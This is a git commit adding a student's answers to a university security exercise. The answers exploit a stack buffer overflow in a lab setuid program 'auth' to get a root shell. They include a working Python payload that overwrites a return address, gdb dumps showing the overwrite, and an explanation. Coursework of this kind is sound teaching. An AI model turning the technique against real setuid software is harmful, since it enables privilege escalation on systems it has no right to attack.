Assignment 2, 3

author: Camil Staps 2015-11-30 22:08:58 +0100
committer: Camil Staps 2015-11-30 22:08:58 +0100
commit: d7c4536c91ddd307fc9b99984ac49b5b5459b485 (patch)
tree: 135749c25cda6177b7712ae425d9559b625f20e0 /CamilStaps-s4498062-Assignment-3/ex4
parent: Initial commit (diff)
1 files changed, 47 insertions, 0 deletions
diff --git a/CamilStaps-s4498062-Assignment-3/ex4 b/CamilStaps-s4498062-Assignment-3/ex4
new file mode 100644
index 0000000..47214a6
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-3/ex4
@@ -0,0 +1,47 @@
+a
+    That would be 0x40085a.
+
+b
+    Done. That gives a root shell:
+
+    $ ./auth "$(python -c 'import struct; print "A"*264+struct.pack("<Q",0x40085a)')"
+    ERROR: password incorrect
+    # 
+    Segmentation fault
+
+c
+    The return address of checkpass has been overwritten with the address of the
+    setuid call. So, after executing checkpass as normally, we 'return' to that
+    setuid call. This explains why we don't read "Starting root shell".
+
+        (gdb) ...
+        0x000000000040082d  14      strcpy(password,input);
+           0x000000000040082a <checkpass+10>:   48 89 e7    mov    rdi,rsp
+        => 0x000000000040082d <checkpass+13>:   e8 0e fe ff ff  call   0x400640 <strcpy@plt>
+        (gdb) x /64bx ($rsp+256)
+        0x7ffe5af18c50: 0x40    0x8d    0xf1    0x5a    0xfe    0x7f    0x00    0x00
+    --> 0x7ffe5af18c58: 0xf2    0x06    0x40    0x00    0x00    0x00    0x00    0x00
+        0x7ffe5af18c60: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
+        0x7ffe5af18c68: 0x45    0x9b    0x05    0x5d    0xdc    0x7f    0x00    0x00
+        0x7ffe5af18c70: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
+        0x7ffe5af18c78: 0x48    0x8d    0xf1    0x5a    0xfe    0x7f    0x00    0x00
+        0x7ffe5af18c80: 0x00    0x00    0x00    0x00    0x02    0x00    0x00    0x00
+        0x7ffe5af18c88: 0xe0    0x06    0x40    0x00    0x00    0x00    0x00    0x00
+        (gdb) ni
+        15      hash1 = crypt(password,"$6$1122334455667788$");
+        => 0x0000000000400832 <checkpass+18>:   be 24 09 40 00  mov    esi,0x400924
+           0x0000000000400837 <checkpass+23>:   48 89 e7    mov    rdi,rsp
+           0x000000000040083a <checkpass+26>:   e8 41 fe ff ff  call   0x400680 <crypt@plt>
+        (gdb) x /64bx ($rsp+256)
+        0x7ffe5af18c50: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
+    --> 0x7ffe5af18c58: 0x5a    0x08    0x40    0x00    0x00    0x00    0x00    0x00
+        0x7ffe5af18c60: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
+        0x7ffe5af18c68: 0x45    0x9b    0x05    0x5d    0xdc    0x7f    0x00    0x00
+        0x7ffe5af18c70: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
+        0x7ffe5af18c78: 0x48    0x8d    0xf1    0x5a    0xfe    0x7f    0x00    0x00
+        0x7ffe5af18c80: 0x00    0x00    0x00    0x00    0x02    0x00    0x00    0x00
+        0x7ffe5af18c88: 0xe0    0x06    0x40    0x00    0x00    0x00    0x00    0x00
+
+    The relevant line is marked with -->. Before the strcpy, the correct return
+    address is there. After, there is our own address.
+
author	Camil Staps	2015-11-30 22:08:58 +0100
committer	Camil Staps	2015-11-30 22:08:58 +0100
commit	d7c4536c91ddd307fc9b99984ac49b5b5459b485 (patch)
tree	135749c25cda6177b7712ae425d9559b625f20e0 /CamilStaps-s4498062-Assignment-3/ex4
parent	Initial commit (diff)